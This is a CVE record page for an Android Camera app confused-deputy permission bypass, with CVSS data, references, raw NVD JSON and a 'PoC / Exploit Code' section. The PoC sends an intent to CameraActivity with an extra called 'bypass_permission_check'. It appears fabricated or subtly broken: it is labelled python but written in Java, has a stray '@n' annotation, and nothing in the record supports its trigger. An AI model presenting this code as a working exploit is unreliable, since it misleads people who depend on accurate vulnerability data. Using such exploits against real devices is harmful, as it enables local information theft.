CVE-2025-36889

Description

In onCreateTasks of CameraActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE

Android Camera App < 2025-12-01 security patch

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-36889 PoC - Android Camera Permission Bypass
// This PoC demonstrates the confused deputy vulnerability in CameraActivity

package com.example.cve202536889;

import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {
    @n
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        
        // Trigger the vulnerable code path in CameraActivity
        Intent maliciousIntent = new Intent();
        maliciousIntent.setClassName("com.android.camera2", 
                                     "com.android.camera.CameraActivity");
        maliciousIntent.setAction("android.media.action.STILL_IMAGE_CAMERA");
        maliciousIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        
        // Add exploit-specific extras to bypass permission checks
        Bundle exploitBundle = new Bundle();
        exploitBundle.putBoolean("bypass_permission_check", true);
        maliciousIntent.putExtras(exploitBundle);
        
        try {
            startActivity(maliciousIntent);
        } catch (SecurityException e) {
            // Handle permission exception
        }
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36889
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36889
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36889/
[4] VulDB https://vuldb.com/cve/CVE-2025-36889
[5] https://source.android.com/security/bulletin/pixel/2025-12-01

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36889", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:55.900", "lastModified": "2025-12-12T17:29:23.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In onCreateTasks of CameraActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-441"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/pixel/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}